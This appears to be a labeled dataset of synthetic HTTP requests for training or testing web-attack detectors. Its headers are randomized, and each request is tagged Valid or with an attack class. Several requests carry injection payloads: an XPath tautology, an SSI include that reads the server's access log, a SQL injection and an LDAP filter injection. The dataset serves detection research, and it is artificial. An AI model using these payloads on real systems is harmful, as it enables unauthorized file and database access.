User-Agent: Mozilla/7.9 (Machintosh; U; PPC 3.6; ti-ou; rv:5.2.2) Gecko/85920830
UA-CPU: x86
UA-Disp: 3738,726,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1335x4049
Via: 5.9 www.2easPee.gif
Transfer-Encoding: gzip
Upgrade: nen/9.1, a8m/4.8, eeIy/6.6, o06on/8.4, 6jt5s/6.6
Warning: 179 www.snrm.css "8ebbnsessuhaeisimedl" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 8614528725280
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27883
Start - Id: 26074
class: Valid
GET /atReausrH.exe?@JlogO=3&mittancqhidP5sF=d4z&uds4eeay1tituL=h%40w8aXD&tie=s&g2Ouetnrax=group+byA&v-Ci4F8Ktmp=68019 HTTP/1.0
Host: 172.40.177.109:20
Connection: keep-alive
Accept: application/rtf;q=0.6, image/jpeg;q=0.3, text/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 104.91.44.192
Cookie: jhdts=gl9iq;uerrvcanies=qosrkSfyr;tLoo=7020471
Cookie2: $Version="30"
Date: Thu, 25 Nov 04 22:15:09 GMT
ETag: W/"lc.HWafmi@6sQmMRq"
Expect: Emueor
From: Daoest@rfoarjtnme.st
If-Modified-Since: Mon, 06 Feb 06 20:28:23 UTC
If-Unmodified-Since: Sun, 05 Sep 04 04:44:23 UTC
If-Match: *
If-None-Match: "vAE.I@6Ph2Nj4Wk"
If-Range: Sat, 12 Jul 08 14:48:45 GMT
Max-Forwards: 2378
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic c0lkZGU2Omhvc1QzZQ==
Authorization: 8xn3a udlexv=E4adtnts
Range: 7282-,650-7357
Referer: http://eionenn.net/3whriot0.ace
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.7 (X11; U; Linux i586 5.2; da-Jl; rv:6.5.2) Gecko/22189876
UA-CPU: MIPS
UA-Disp: 5226,2357,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 096x0326
Via: dnt/4.6 www.rlsst2s.css, 4.4 www.otltp.png, oriioi/0.4 www.5sPfr4as.js
Transfer-Encoding: eodc
Upgrade: adreto/0.5, erstt/5.5, 1elbre/0.6
Warning: 849 www.lsim.tiff:35662 "ifqLts" "Mon, 09 Jan 06 16:39:11 CET"
X-Forwarded-For: 72.230.129.152
X-Serial-Number: 39635409831917
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26074
Start - Id: 49938
class: XPathInjection
GET /tliyitOehg5tc/5vPJo5/2I/es/tr-9aSZJG5n/vqvgY_SaqM3b5db0r.w.cgi?mjhstrc=bwayibuy%27+++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or++++%27tccys%27+++%3D++++%27&teidaaeespb=7sb3eBGnttDem- HTTP/1.0
Host: 31.19.115.65
Connection: keep-alive
Accept: video/*, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 69.149.110.120
Cookie: 0we37rEtCab=t;.DcfP=e;sz=nt1saf8hje;tescj=sn6ddnrt;te/o soli;eoL=eaiw9o;cDbsc0Tat=9145356
Cookie2: $Version="924"
Date: Sat, 08 Jul 06 16:24:40 CET
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Thu, 25 Jan 07 13:48:17 GMT
If-Unmodified-Since: Thu, 19 Apr 07 19:43:28 CET
If-Match: *
If-None-Match: "muZqlDxp0r9@lt5VLUp"
If-Range: Wed, 17 Jun 09 19:08:31 GMT
Max-Forwards: 3224
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bmhlc3JhZmx0ZHFibzVlY2FvZm1qczNUZW5hbGFObXdzbg==
Range: 1672-72499
Referer: /2tot/onodw/gbSzt.nsf
TE: deflate,trailers
Trailer: Via
User-Agent: 2esn (hoMXFGSy)
UA-CPU: x86
UA-Disp: 4764,9289,32
UA-OS: Linux
UA-Pixels: 299x2707
Via: oOe/3.4 www.awnisqsa.tiff
Transfer-Encoding: deflate
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49938
Start - Id: 34694
class: Valid
POST /nQYprocessing-instruction/tHRq/VCh@mWkK/npoaiamNriReest/Q9AEMyJVj/fnNee1aeoiwnonmnq5aa/1W_form/okJOWGxXyWvcsg_W/jnpnkwbb2t/usa/54yc/zuttw.cgi? HTTP/1.0
Content-Length: 73
Content-Language: ht,dTNI
Content-Encoding: identity
Content-Location: http://www.eWuveE.cz/etet/legI/Fiunre/ydae5pi.php3
Content-MD5: dGJvMldpRmVhbGF1ZGFqZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Nov 06 17:19:13 GMT
Last-Modified: Sun, 16 Dec 07 17:01:51 CET
Host: www.foeosgem.de
Connection: uett9
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8
Accept-Encoding: compress, gzip;q=0.8, identity, gzip;q=0.4, deflate;q=0.0
Accept-Language: lh83-cq, dAedabqa-5msu
Cache-Control: ee=P
Client-ip: 213.102.74.106
Cookie: yxas=taorclseie;osftdeath5Asds=Tg;R75it1ysy=6216;st3hntmldxo=fntstwsaa3;ujrneevcc=rozh;4ohtaccesa=897450
Cookie2: $Version="698"
Date: Tue, 31 Mar 09 23:18:36 UTC
ETag: W/"52tv60PAC43reuiKCX"
Expect: 6slv4=denapn;gAAnesr=noerne
From: wlrxud9@ywS48o.gov
If-Modified-Since: Mon, 06 Oct 08 04:06:16 GMT
If-Unmodified-Since: Sat, 23 Aug 08 22:59:39 GMT
If-Match: "5nRyM37h-Q0zq8JwFJ"
If-None-Match: "l9NP@OZZXGtfyrnlkXV"
If-Range: "s1xWb.nN0Z8PXuKh"
Max-Forwards: 30
MIME-Version: 0.4
Pragma: rhssUtei=egzo
Proxy-Authorization: jkfeae oftdsmoi=dLti
Authorization: 7nNT ahacisl7=aqe1ag
Range: 8-1569,896078-8542
Referer: http://tr1rD.com/ja2eit/sdixge/dvsbcnli/hqdhsotN.sh
TE: gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 9.6; lt-hf; rv:4.0.7) Gecko/23183384
UA-CPU: Sparc
UA-Disp: 081,3578,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 163x0175
Via: 9.8 197.201.91.91:79641, 9.3 245.164.0.100
Transfer-Encoding: compress
Upgrade: nq8o/9.4, hsea/1.7
Warning: 071 255.234.189.147 "esuO" "Wed, 29 Oct 08 05:15:07 GMT"
X-Forwarded-For: 202.121.49.166
X-Serial-Number: 30358
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

S8zmochaFIT=cre&era=633457865&in5r=32396247&tb=mQL&ruo5=iframefsuuAt ehnY

End - Id: 34694
Start - Id: 39542
class: SSI
POST /EGwaeysTMma1fimathy/nrnNsterhi/rRMV_T1Q9MwrP-oJH/emy/2IHL@T0/lR/erQ_GgC5/pomaoc0if/zQ/oFhqDxoMfuO.mdb? HTTP/1.1
Content-Length: 289
Content-Language: sfbvnro,u
Content-Encoding: identity
Content-Location: http://pdsiT.net/olc4T/saahl8dn/eofsz/ieDS.jpg
Content-MD5: QWVnYTlzZGQ2bW1lc21hdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Jan 06 12:10:21 CET
Last-Modified: Sat, 03 Feb 07 16:39:11 GMT
Host: 50.22.147.104:531
Connection: keep-alive
Accept: video/quicktime, image/*, image/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-dleegn;q=0.8, 1r-iBsh;q=0.0, ea-diirde, da8tl-wE
Cache-Control: no-store
Client-ip: 94.165.84.44
Cookie: PpFZIZ=oipu ;t3=gsuthtataiAewec0
Cookie2: $Version="21"
Date: Sun, 10 Sep 06 01:46:21 UTC
From: anNXI@zoaAetu.fr
If-Modified-Since: Tue, 27 Jan 09 12:01:10 UTC
If-Unmodified-Since: Tue, 28 Dec 04 19:24:25 CET
If-Match: *
If-None-Match: "Wo2ebZMJidzslMq"
Max-Forwards: 5
MIME-Version: 5.2
Proxy-Authorization: Basic Vm5zcmFwOjI2aWtvc2Q=
Authorization: Digest nc=bf6CeAFC
Referer: http://mhlo.it/tgatn.cgi
TE: trailers,gzip;q=0.9
Trailer: Authorization
User-Agent: tistw1s
UA-Color: color8
Via: 0.0 138.99.195.173:79
Transfer-Encoding: compress
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 543 www.ydocee8.html "biTseoerdCyyr4oaht" 
X-Serial-Number: 1385275787999892465
----: -----------

adr4rw40xosc=A5l>ccx>oaenro4&vaohl1ashcts=ahn&LxTXPY=864&01mail_-=lstf&aaate69=linkr %&aoeje=e9uotlret&ihbaowsnint=<!--   #include virtual="/var/log/httpd/access.log"-->&frey=2kdperlce&lRnodehR=norsnut5o5e5ebah&cs=docsj3tkCHdd&jCl5ytoheukee=h@wzpQyuk&msegA=7 

End - Id: 39542
Start - Id: 42416
class: SqlInjection
GET /6Q.@NT3.n@eHvd-OP_/kVrDpI241PNz.jpg?saeaotecaeejac=2975117&avl5=iiRpnxouojus35&iz=05&5Cvetofzn=%27+++++OR+++%27Foiz%27++++%3E++++%27S&@GA8=z6rHugBeii2nA2bd&ox=aH%3FgThs&gdBJM=92967&aNolerpe5wukt=96 HTTP/1.1
Host: 131.160.112.88
Connection: aemfceq
Accept: application/*, video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="78"
Date: Sun, 29 Mar 09 23:46:42 UTC
ETag: "ihNWxKiFaZe3DCw"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Sun, 29 Aug 04 03:43:16 GMT
If-Match: "-ffPhpV3OKtYwCFYBc"
If-None-Match: *
If-Range: "idDGCh2fXpJaK9HpvV"
Max-Forwards: 9255
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: 005696-6624,4-
Referer: /enoaiw9.avi
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.6 (compatible; MSIE 9.5; Win98; vdsnv; hei8iieves)
UA-CPU: StrongARM
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: 5.6 www.b2o1.htm, FTP/5.6 www.3ej7.html
Transfer-Encoding: identity
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 522 98.185.89.29 "D7lvr5tesig" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42416
Start - Id: 38390
class: LdapInjection
GET /i@sp/jI.asmx?png=deemeS&hseaopk=520%29%28%26%28objectClass%3D1ewl%29%28%7C%28sn+++%3Dos%29%28cn%3D58+J*%29%29&bqge0ttteotad9=272297 HTTP/1.0
Host: www.mnre.st:80
Connection: keep-alive
Accept: audio/*;q=0.6, audio/*, text/html
Accept-Charset: euc-kr;q=0.3, x-mac-turkish;q=0.0, x-mac-chinesesimp, iso-8859-8-i, iso-2022-kr
Accept-Encoding: compress;q=0.5, deflate;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 198.17.15.97
Cookie: ht8alh=76017742;ci5rtttiRdss=f
Cookie2: $Version="08"
Date: Sun, 07 Dec 08 12:21:14 UTC
ETag: W/"yNFl3unHM9j-nY_lvkD"
Expect: uFhie
From: e3ig@cUsnasr.com
If-Modified-Since: Thu, 29 Sep 05 01:44:50 GMT
If-Unmodified-Since: Sun, 25 Jul 04 08:39:03 CET
If-Match: "R7Fr@yJwW1yPDdpex"
If-None-Match: *
If-Range: Thu, 14 Jan 10 16:11:26 UTC
Max-Forwards: 6
MIME-Version: 5.2
Pragma: tc90ZoiY=aiUncnum
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: 4sexi cs9e=nrrbsKhu
Range: 5-3896,18685-499682,-36
Referer: /met6ehc/om6n/rndecijd/rv9nglhe.nsf
TE: chunked;q=0.2,trailers,chunked;q=0.4
Trailer: If-Range
User-Agent: Mozilla/9.2 (compatible; rt5rMO3; Mac OS X; eUTyrnt8d)
UA-CPU: x86
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/1.6 160.150.147.193, 0.3 40.189.67.2
Transfer-Encoding: gzip
Upgrade: oHser/7.1, outinw/4.0, weeBc/8.7, ngy3/2.0, rTe/9.3
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 120.14.244.116
X-Serial-Number: 85165873223938
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38390
Start - Id: 12680
class: Valid
GET /etf.exe? HTTP/1.1
Host: 19.76.130.156
Connection: keep-alive
Accept: audio/x-wav;q=0.5
Accept-Charset: iso-8859-3, windows-1257;q=0.7, iso-8859-2;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=46697
Client-ip: 40.108.235.175
Cookie: yEhecaf2oiti=iie
Cookie2: $Version="4"
Date: Thu, 03 Jan 08 08:38:36 GMT
ETag: "Z6bDR6ol6FudYgKgsa"
Expect: 100-continue
From: heour@oeunirs.uk
If-Modified-Since: Sun, 16 Oct 05 20:21:10 GMT
If-Unmodified-Since: Fri, 12 Mar 10 10:09:45 GMT
If-Match: "ZG1kXH-5HZsz7owtU"
If-None-Match: "CmXR38jwHEtLyFU_U."
If-Range: *
Max-Forwards: 3
MIME-Version: 3.8
Pragma: less=1
Proxy-Authorization: Basic bzJtc3RTdDpyc3JnaXB0Tw==
Authorization: hkPedt einsnc=lIImlmc
Range: 123920-
Referer: /hiale.php
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.9 (Windows; U; WinNT 3.2; dn-eb; rv:7.3.8) Gecko/02839193
UA-CPU: Sparc
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 118x1271
Via: 5.0 www.Idtezuir.tiff:9797
Transfer-Encoding: deflate
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 017 www.eeFtzebe.shtml:944 "ehscnss3leaen" 
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 444066878
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12680
Start - Id: 28992
class: Valid
GET /KPL.jpg?fylq7weA=65&es=iLZ1c.2D8l&e5atHtsuchrbi=0393085&zevalONAl=22&ehn0Aidhsorim=ihejaal&RB7ve.ihj6W5=swoaxt HTTP/1.0
Host: www.lalhiib.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.3
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=139
Client-ip: 184.212.174.109
Cookie: eehnL=rIzN4lOFA;lyBJpsc=7220582;GVVbky=ogebd0a;e4hjbdso=be?pG=;tgeemlspyt=iome
Cookie2: $Version="232"
Date: Thu, 19 Oct 06 20:06:09 GMT
ETag: "6W6lizwmf3Sl4Tos"
Expect: na2f=odrapD
From: wtctrua@rxqmyrhe.be
If-Modified-Since: Fri, 23 Jan 04 19:00:07 CET
If-Unmodified-Since: Thu, 15 Feb 07 10:44:42 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Jan 10 04:12:31 GMT
Max-Forwards: 1714
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest cnonce="crce"
Range: -235,-134,-73411
Referer: /eoOi9i/3rce/sHmZr/lRiEosse/mitArasp.avi
TE: chunked;q=0.5,gzip,chunked;q=0.0
Trailer: If-Range
User-Agent: Mozilla/4.7 (compatible; Konqueror/9.0; Win 9x; unaFrwrel; Ai5clD)
UA-CPU: MIPS
UA-Disp: 011,231,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 907x891
Via: FTP/9.0 4.53.207.136
Transfer-Encoding: deflate
Upgrade: rpq0t/1.3, h5yess/6.6
Warning: 848 www.1zbi.js "tteneag" 
X-Forwarded-For: 91.46.165.1
X-Serial-Number: 055751373307057
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 28992
Start - Id: 21336
class: Valid
GET /hMVy6wbnN4OYD/nl48N4bROf6Q/99dj91OU5/4ncOz0w/c4obenus0.html?epie9trvcmwn75=o0-tzjECB&ondsex=14844094&_H-CNEl27=62343&oedeaae=78636150&ieoooeevrtd=rex6eVcatsock_streamq9accepty+&e0llsmxi=a4keu59&rhsa1hbapoyuwje=35972785&Wahbirog8sE4=5157515&791sT=rFfni40&u2WVKQ.r=cAwbf_w HTTP/1.1
Host: 112.225.243.235
Connection: close
Accept: application/zip;q=0.0
Accept-Charset: x-mac-ce, iso-8859-8-i;q=0.5, euc-tw, ks_c_5601-1987;q=0.7
Accept-Encoding: compress;q=0.4, gzip, deflate;q=0.5
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 77.98.59.51
Cookie: rxtMTag9ls=14681960;iOyia4a7A5n='hEses4af\e;pn5sgnpc8ia=05t7y8];PIimuizeshcknli=uhtsnfeahulseu;uorrAhafv27thn=m<i$g;sedeOjd=6
Cookie2: $Version="163"
Date: Wed, 31 Mar 04 13:27:45 UTC
ETag: "t1csvA7u4nvzVMov1wM"
Expect: 100-continue
From: oi0i@it43.it
If-Modified-Since: Mon, 11 Feb 08 11:13:31 GMT
If-Unmodified-Since: Tue, 10 Jan 06 23:50:46 CET
If-Match: "zQB7qM3a4xWEPGRz-H"
If-None-Match: *
If-Range: Sun, 06 May 07 03:19:38 CET
Max-Forwards: 0700
MIME-Version: 6.0
Pragma: t=gNp1ee
Proxy-Authorization: Basic YTlpNjpsb3JF
Authorization: Digest uri=/l7Tnqroh.nsf
Range: 7-27394,731-8,0552-
Referer: http://www.z1ziuun.cz/etXot/y7et7u/snnrs2.jpeg
TE: gzip
Trailer: Referer
User-Agent: Mozilla/8.5 (Windows; U; WinNT 7.9; mr-io; rv:9.0.3) Gecko/36176380
UA-CPU: 68000
UA-Disp: 568,509,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 040x521
Via: 3.3 www.kilene.shtml
Transfer-Encoding: eazay; l8leac=hta3lett
Upgrade: ews/8.3
Warning: 480 www.6ge64dis.htm "TNisirlesy0eema" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21336
Start - Id: 19639
class: Valid
GET /iskephTre/esLdsureermyL/oZMgR@1gLrAzjgNM/cRMoptxI.tiff?MEm@J=lmH5f0q&cietb=l&6qJmfqT=rSK&ekdrnt=Iyr&amordDra=644 HTTP/1.0
Host: www.eafs.com
Connection: EzBnsi
Accept: image/jpeg;q=0.6, application/*, application/x-tar;q=0.1
Accept-Charset: x-mac-turkish;q=0.8, windows-1251;q=0.9, shift_jis;q=0.9, x-mac-korean, windows-1258
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 214.52.69.197
Cookie: 6bdeeaihr=18;eP=atosq;ftkHaaxrnQBdelete=icbon;hwmsi9l=679;zeIlnhaiewua=)ehei
Cookie2: $Version="644"
Date: Tue, 18 Oct 05 09:37:26 CET
ETag: W/"CUhNPirgxLy0Moc"
Expect: 5iapapo
From: 5I1Ng@daEopu.org
If-Modified-Since: Wed, 21 Oct 09 18:47:59 UTC
If-Unmodified-Since: Mon, 19 Jun 06 01:38:15 GMT
If-Match: "zCxm1vS4IhDvaEz2d"
If-None-Match: *
If-Range: Thu, 15 Apr 04 03:02:34 GMT
Max-Forwards: 1694
MIME-Version: 6.3
Pragma: hholetu='1gp'
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: NTLM eWdscmVkZ2VTdFJvZGdNcDR0ZHVBaW1pemFudFRjaTZ1bm43cnN3ZWxzdGd3
Range: 3666-92,-7
Referer: http://www.zTMdzoi.st/iaye.css
TE: deflate,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/8.9 (X11; U; Linux i386 3.0; wg-se; rv:7.8.5) Gecko/81458402
UA-CPU: x86
UA-Disp: 1867,055,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2031x847
Via: 9.5 251.251.80.139, ene/8.8 www.otmcrbcr.css, HTTP/2.4 www.stei2.shtml
Transfer-Encoding: tshn; rtyita=wifo
Upgrade: emf/6.5
Warning: 311 www.Werengn.htm "uwnHorhfkumatwT" "Wed, 23 Jul 08 22:55:33 GMT"
X-Forwarded-For: 44.241.139.6
X-Serial-Number: 84453733272881684848
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19639
Start - Id: 4873
class: Valid
PUT /iqUFg5H_xtermhsD-Icopy/7wjQ.O76p/e9rWeihetluaeq/tt9e8tPszrNroC/1benpb/ugaaR_rSR6/wmoltD80o/t5./oceil3tsteeeocN.asmx? HTTP/1.0
Content-Length: 161
Content-Language: 2qs,oetseyi,n4tc
Content-Encoding: compress
Content-Location: http://tNd3r.fr/orh6alne/oeij/rfna/rirddbsa.zip
Content-MD5: cHJhcmxlaHkyNG1BT2d0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Sep 06 15:21:57 CET
Last-Modified: Sun, 09 Sep 07 04:44:40 GMT
Host: www.u0lTcrr.de:83
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258
Accept-Encoding: gzip
Accept-Language: dnziais-jdotl0y;q=0.7, oz-dlrnl, a-9t
Cache-Control: max-age=40
Client-ip: 184.17.21.85
Cookie: eieo8Sibmsnotae=51200;pzY4@ho=4ut;64b=eEaeutspezSpd1lo;eoe1ae3teezrer=;dSiaiwl0IevalRYmv'idap
Cookie2: $Version="272"
Date: Thu, 29 Sep 05 14:28:36 GMT
ETag: "dcMVOniXcAScfLf"
Expect: 100-continue
From: iwez885u@t0xh0Td.fr
If-Modified-Since: Fri, 04 Mar 05 08:15:57 UTC
If-Unmodified-Since: Sun, 25 Dec 05 17:21:25 CET
If-Match: "-OgCRLfqtDKOTG9T"
If-None-Match: *
If-Range: Thu, 01 May 08 24:50:21 GMT
Max-Forwards: 6333
MIME-Version: 1.5
Pragma: 7hsacaU=g
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Digest nc=Ac68027f
Range: 037-,-640695
Referer: http://tdmte2.it/P3at/7usst/ito4/7mebtoye/snm6t.zip
TE: deflate,trailers,chunked;q=0.8
Trailer: Range
User-Agent: Mozilla/9.4 (X11; U; Unix 9.7; et-xy; rv:4.1.2) Gecko/75454201
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 931x5037
Via: 1.6 www.sXGhoe.png, HTTP/2.0 www.824ndha.css
Transfer-Encoding: identity
Upgrade: rt3e/2.9, rga/0.4, wbbt/8.3
Warning: 052 www.jmtpve.html "ytaeSdIznyE" "Sat, 21 Oct 06 11:21:32 CET"
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hAa=|:idI+ritUyoov&w.JQ_D=3517&AszleSR=e-2i>&1DDZ=ngdAhtpassformc8ascriptrDrf%f&os6=rtwinnt]daoscuta=r6do&K3ert0cmty=8567015&E4bhk5dfznJo6fS=2&ah=9

End - Id: 4873
Start - Id: 12846
class: Valid
GET /osABnzRKtkWxAPWBPqR/9thbetc2mjh3/p-jK/kHdE8efqcexec/ei3Q.N.msf?buoN=35&nhteai6tmt2=1947408&emttz=113713506 HTTP/1.1
Host: www.NcXon.gov:80
Connection: tedtOAhr
Accept: audio/x-wav;q=0.2, audio/basic;q=0.6, text/html;q=0.2
Accept-Charset: macintosh;q=0.6, utf-7;q=0.0, big5;q=0.4, big5, big5;q=0.0
Accept-Encoding: identity, identity;q=0.5, deflate;q=0.4, identity;q=0.9
Accept-Language: 6lIBs8b-htaygtoi;q=0.7, tA-lctq2, eARkruts-rn;q=0.4, e-t;q=0.7, hd3ml-sda;q=0.3
Cache-Control: no-store
Client-ip: 100.64.54.199
Cookie: slFdmshe=945346181;iTe3sdy=oYteot7el;zmochaFJXxH8tz=ts;bypi=aassrechhstsr3o;byNgad=tmd;yoatLes=ncLewe0aeHaamae9ts
Cookie2: $Version="875"
Date: Wed, 30 Dec 09 08:31:54 GMT
ETag: "WU-5gxwcCX1t42G2qlC"
Expect: tbcewaEG
From: iirE@eyRmP2.biz
If-Modified-Since: Thu, 02 Mar 06 19:33:49 GMT
If-Unmodified-Since: Sun, 15 Aug 04 06:04:56 GMT
If-Match: *
If-None-Match: "KvRqI-DIn1hWrNw"
If-Range: "pUXiYpH3If.YPIoT"
Max-Forwards: 72
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic ZG5yVzphZGxldHk=
Authorization: Basic YXRpZzptb2Jhc3Q0
Range: 98709-37276,-196
Referer: http://coak.uk/mi4Oa7so/ljb9n/etYch/Orihbdm.doc
TE: deflate,chunked;q=0.6
Trailer: Host
User-Agent: Mozilla/3.0 (Machintosh; U; Mac OS X 5.5; me-is; rv:6.3.6) Gecko/37673895
UA-CPU: Sparc
UA-Disp: 6911,855,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0320x5347
Via: HTTP/4.3 173.95.28.83, 5.9 www.n4at6oa8.png, 1.8 141.111.249.172
Transfer-Encoding: identity
Upgrade: zoadt/1.0
Warning: 023 46.69.92.183:144 "hntstronN5s42o" 
X-Forwarded-For: 126.193.58.111
X-Serial-Number: 267270605384116
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12846
Start - Id: 34552
class: Valid
PUT /6M2JreplaceU0IB/uReeicEnhruEVo/th1rmrtots/nMRaV5smIkf2n@cIni1P.dll? HTTP/1.0
Content-Length: 155
Content-Language: egio,Ceddot
Content-Encoding: deflate
Content-Location: http://EioCo.be/aott/46yr.cfm
Content-MD5: ZXRvZG5lbmlhbnRhdXJkZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Jun 08 19:20:34 CET
Last-Modified: Sun, 06 May 07 18:53:04 UTC
Host: www.t4eaB.org
Connection: 03x2qnz
Accept: */*
Accept-Charset: iso-2022-jp, iso-8859-15
Accept-Encoding: gzip, gzip;q=0.8
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 142.252.150.238
Cookie: sO4Tre=6l+i'winnt;lwevgn2d=itl84ofeoe9bNiihhU;uwO18jhtaccesV=3ten;sclv=a;f0etfdoew4Soo=&/
Cookie2: $Version="819"
Date: Mon, 04 Jul 05 10:49:56 UTC
ETag: "YdC-fP2LHF4Ov07N"
Expect: yiqyob
From: r4o9@ecoOy.ch
If-Modified-Since: Wed, 20 Feb 08 05:51:52 GMT
If-Unmodified-Since: Wed, 30 Apr 08 01:01:52 GMT
If-Match: *
If-None-Match: "VzPrdL0r3vyJq45iGdz"
If-Range: Thu, 17 Jun 04 05:33:31 CET
Max-Forwards: 669
MIME-Version: 0.1
Pragma: sytf='biaas'
Proxy-Authorization: NTLM bGNobmljaGtpdFJ4a0tDY2hsbmxGaHI1dG15ZWVjbm9hdHNjbw==
Authorization: Digest cnonce="daLd"
Range: 700959-,22-,44069-
Referer: http://0siney99.biz/deihgs/rcsa/zfuegs/waa5/kx1aza.png
TE: chunked;q=0.9
Trailer: Via
User-Agent: Mozilla/8.4 (X11; U; Linux i586 7.8; ij-ny; rv:3.1.3) Gecko/46469373
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 066x785
Via: FTP/7.4 42.104.118.172:888, 4.7 www.yI8sire.gif, 9.1 158.117.234.127:99765
Transfer-Encoding: compress
Upgrade: nsrg/4.0, ieR/8.7, bte/5.1, eocer/6.3, rohet/6.9
Warning: 500 www.ti17tt.gif "dusstaodfngdots" 
X-Forwarded-For: 229.185.142.119
X-Serial-Number: 899542790
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

4d2dfrt=1052&lka=hnlrm&krihlmlrd=hettnrn0hdo51&rdrfdguyfeE5k=xtssA%u&CMJEoMgFb0MG=1878957&BCJZTENdH=817563&vfApntxpsweoQah=630742&o6oc7nxflnol6=hnlloNrAd

End - Id: 34552
Start - Id: 41230
